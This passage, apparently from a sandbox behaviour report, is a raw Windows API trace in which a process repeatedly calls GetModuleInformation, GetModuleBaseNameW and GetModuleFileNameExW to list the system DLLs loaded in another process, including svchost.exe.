lpmodinfo=0x25a7b18*(lpBaseOfDll=0x7fef3600000, SizeOfImage=0x125000, EntryPoint=0x7fef3651570)) returned 1 [0052.253] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3600000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="dbghelp.dll") returned 0xb [0052.256] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3600000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll")) returned 0x1f [0052.260] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9b80000, lpmodinfo=0x25a9cd8, cb=0x18 | out: lpmodinfo=0x25a9cd8*(lpBaseOfDll=0x7fef9b80000, SizeOfImage=0xe000, EntryPoint=0x7fef9b85500)) returned 1 [0052.263] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9b80000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wbemprox.dll") returned 0xc [0052.267] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9b80000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")) returned 0x25 [0052.270] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9e20000, lpmodinfo=0x25abeb0, cb=0x18 | out: lpmodinfo=0x25abeb0*(lpBaseOfDll=0x7fef9e20000, SizeOfImage=0x77000, EntryPoint=0x7fef9e5e7f0)) returned 1 [0052.273] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9e20000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wbemcomn2.DLL") returned 0xd [0052.277] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9e20000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbemcomn2.DLL" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")) returned 0x21 [0052.280] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd1e0000, lpmodinfo=0x25ae4b0, cb=0x18 | out: lpmodinfo=0x25ae4b0*(lpBaseOfDll=0x7fefd1e0000, SizeOfImage=0x22000, EntryPoint=0x7fefd1e5d30)) returned 1 [0052.283] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd1e0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0052.287] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd1e0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0052.290] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef98a0000, lpmodinfo=0x25b0670, cb=0x18 | out: lpmodinfo=0x25b0670*(lpBaseOfDll=0x7fef98a0000, SizeOfImage=0x13000, EntryPoint=0x7fef98a1d80)) returned 1 [0052.296] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef98a0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wbemsvc.dll") returned 0xb [0052.299] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef98a0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")) returned 0x24 [0052.303] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9bc0000, lpmodinfo=0x25b2840, cb=0x18 | out: lpmodinfo=0x25b2840*(lpBaseOfDll=0x7fef9bc0000, SizeOfImage=0xd3000, EntryPoint=0x7fef9c38b00)) returned 1 [0052.307] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9bc0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="fastprox.dll") returned 0xc [0052.311] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9bc0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")) returned 0x25 [0052.314] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9b90000, lpmodinfo=0x25b4a18, cb=0x18 | out: lpmodinfo=0x25b4a18*(lpBaseOfDll=0x7fef9b90000, SizeOfImage=0x27000, EntryPoint=0x7fef9b911a0)) returned 1 [0052.318] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9b90000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="NTDSAPI.dll") returned 0xb [0052.321] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9b90000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NTDSAPI.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")) returned 0x1f [0052.325] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3550000, lpmodinfo=0x25b6bd8, cb=0x18 | out: lpmodinfo=0x25b6bd8*(lpBaseOfDll=0x7fef3550000, SizeOfImage=0xae000, EntryPoint=0x7fef3554104)) returned 1 [0052.329] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3550000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wuapi.dll") returned 0x9 [0052.332] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3550000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll")) returned 0x1d [0052.336] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9e0000, lpmodinfo=0x25b8d98, cb=0x18 | out: lpmodinfo=0x25b8d98*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0052.340] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0052.344] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0052.348] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd820000, lpmodinfo=0x25baf58, cb=0x18 | out: lpmodinfo=0x25baf58*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0052.351] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd820000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0052.355] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd820000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0052.359] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3530000, lpmodinfo=0x25bd118, cb=0x18 | out: lpmodinfo=0x25bd118*(lpBaseOfDll=0x7fef3530000, SizeOfImage=0x1b000, EntryPoint=0x7fef3531198)) returned 1 [0052.363] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3530000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="Cabinet.dll") returned 0xb [0052.367] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3530000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\Cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")) returned 0x1f [0052.371] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd830000, lpmodinfo=0x25bf2d8, cb=0x18 | out: lpmodinfo=0x25bf2d8*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0052.375] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd830000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0052.378] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd830000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0052.382] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd780000, lpmodinfo=0x25c14a8, cb=0x18 | out: lpmodinfo=0x25c14a8*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0052.386] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd780000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0052.391] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd780000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0052.395] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb20000, lpmodinfo=0x25c3668, cb=0x18 | out: lpmodinfo=0x25c3668*(lpBaseOfDll=0x7fefcb20000, SizeOfImage=0x1e000, EntryPoint=0x7fefcb213b8)) returned 1 [0052.399] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb20000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="USERENV.dll") returned 0xb [0052.402] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb20000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\USERENV.dll" (normalized: "c:\\windows\\system32\\userenv.dll")) returned 0x1f [0052.407] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb9a0000, lpmodinfo=0x25c5828, cb=0x18 | out: lpmodinfo=0x25c5828*(lpBaseOfDll=0x7fefb9a0000, SizeOfImage=0x15000, EntryPoint=0x7fefb9a1050)) returned 1 [0052.411] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb9a0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wkscli.dll") returned 0xa [0052.415] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb9a0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")) returned 0x1e [0052.419] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb9c0000, lpmodinfo=0x25c79e8, cb=0x18 | out: lpmodinfo=0x25c79e8*(lpBaseOfDll=0x7fefb9c0000, SizeOfImage=0xc000, EntryPoint=0x7fefb9c18a4)) returned 1 [0052.423] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb9c0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="netutils.dll") returned 0xc [0052.427] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb9c0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")) returned 0x20 [0052.431] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a0) returned 0x218 [0052.431] EnumProcessModules (in: hProcess=0x218, lphModule=0x25cb9d0, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25cb9d0, lpcbNeeded=0x41eb20) returned 1 [0052.433] GetModuleInformation (in: hProcess=0x218, hModule=0xff760000, lpmodinfo=0x25cbc40, cb=0x18 | out: lpmodinfo=0x25cbc40*(lpBaseOfDll=0xff760000, SizeOfImage=0xb000, EntryPoint=0xff76246c)) returned 1 [0052.434] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xff760000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0052.434] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xff760000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0052.434] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x25cde38, cb=0x18 | out: lpmodinfo=0x25cde38*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0052.435] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0052.435] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0052.435] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x25cfff8, cb=0x18 | out: lpmodinfo=0x25cfff8*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0052.436] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0052.436] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0052.437] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x25d21c8, cb=0x18 | out: lpmodinfo=0x25d21c8*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0052.438] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0052.438] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0052.439] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x25d43b0, cb=0x18 | out: lpmodinfo=0x25d43b0*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0052.439] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0052.439] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0052.440] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x25d65c8, cb=0x18 | out: lpmodinfo=0x25d65c8*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0052.440] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0052.441] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0052.441] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x25d8788, cb=0x18 | out: lpmodinfo=0x25d8788*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0052.442] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0052.442] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0052.443] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff760000, lpmodinfo=0x25da948, cb=0x18 | out: lpmodinfo=0x25da948*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0052.444] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff760000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0052.444] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff760000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0052.445] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x25dcb08, cb=0x18 | out: lpmodinfo=0x25dcb08*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0052.445] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0052.446] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0052.447] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x25ded60, cb=0x18 | out: lpmodinfo=0x25ded60*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0052.447] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0052.448] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0052.449] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x25e0f20, cb=0x18 | out: lpmodinfo=0x25e0f20*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0052.449] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0052.450] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0052.451] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x25e30d0, cb=0x18 | out: lpmodinfo=0x25e30d0*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0052.452] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0052.453] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0052.453] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x25e5290, cb=0x18 | out: lpmodinfo=0x25e5290*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0052.454] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0052.455] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0052.456] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x25e7450, cb=0x18 | out: lpmodinfo=0x25e7450*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0052.457] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0052.457] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0052.458] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x25e9610, cb=0x18 | out: lpmodinfo=0x25e9610*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0052.459] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0052.460] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0052.461] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x25eb7e0, cb=0x18 | out: lpmodinfo=0x25eb7e0*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0052.462] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0052.463] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0052.464] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef41c0000, lpmodinfo=0x25ed9b0, cb=0x18 | out: lpmodinfo=0x25ed9b0*(lpBaseOfDll=0x7fef41c0000, SizeOfImage=0x34000, EntryPoint=0x7fef41e9228)) returned 1 [0052.465] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef41c0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ssdpsrv.dll") returned 0xb [0052.466] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef41c0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\ssdpsrv.dll" (normalized: "c:\\windows\\system32\\ssdpsrv.dll")) returned 0x1f [0052.467] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff970000, lpmodinfo=0x25efc88, cb=0x18 | out: lpmodinfo=0x25efc88*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0052.468] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff970000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0052.469] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff970000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0052.470] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9c0000, lpmodinfo=0x25f1e48, cb=0x18 | out: lpmodinfo=0x25f1e48*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0052.471] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9c0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0052.472] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9c0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0052.474] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc950000, lpmodinfo=0x25f3ff8, cb=0x18 | out: lpmodinfo=0x25f3ff8*(lpBaseOfDll=0x7fefc950000, SizeOfImage=0xbb000, EntryPoint=0x7fefc956de0)) returned 1 [0052.475] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc950000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="FirewallAPI.dll") returned 0xf [0052.476] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc950000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")) returned 0x23 [0052.477] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc940000, lpmodinfo=0x25f61c8, cb=0x18 | out: lpmodinfo=0x25f61c8*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0052.478] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc940000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0052.479] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc940000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0052.481] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb270000, lpmodinfo=0x25f83a0, cb=0x18 | out: lpmodinfo=0x25f83a0*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0052.483] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb270000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0052.484] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb270000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0052.485] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb260000, lpmodinfo=0x25fa570, cb=0x18 | out: lpmodinfo=0x25fa570*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0052.486] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb260000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0052.488] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb260000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0052.489] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac20000, lpmodinfo=0x25fc730, cb=0x18 | out: lpmodinfo=0x25fc730*(lpBaseOfDll=0x7fefac20000, SizeOfImage=0x11000, EntryPoint=0x7fefac216ac)) returned 1 [0052.490] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac20000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0052.492] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac20000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")) returned 0x21 [0052.493] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac00000, lpmodinfo=0x25fe900, cb=0x18 | out: lpmodinfo=0x25fe900*(lpBaseOfDll=0x7fefac00000, SizeOfImage=0x18000, EntryPoint=0x7fefac01bf8)) returned 1 [0052.494] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac00000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0052.496] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac00000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")) returned 0x20 [0052.497] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd070000, lpmodinfo=0x2600ad0, cb=0x18 | out: lpmodinfo=0x2600ad0*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0052.499] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd070000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0052.501] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd070000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0052.502] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd70000, lpmodinfo=0x2602c90, cb=0x18 | out: lpmodinfo=0x2602c90*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 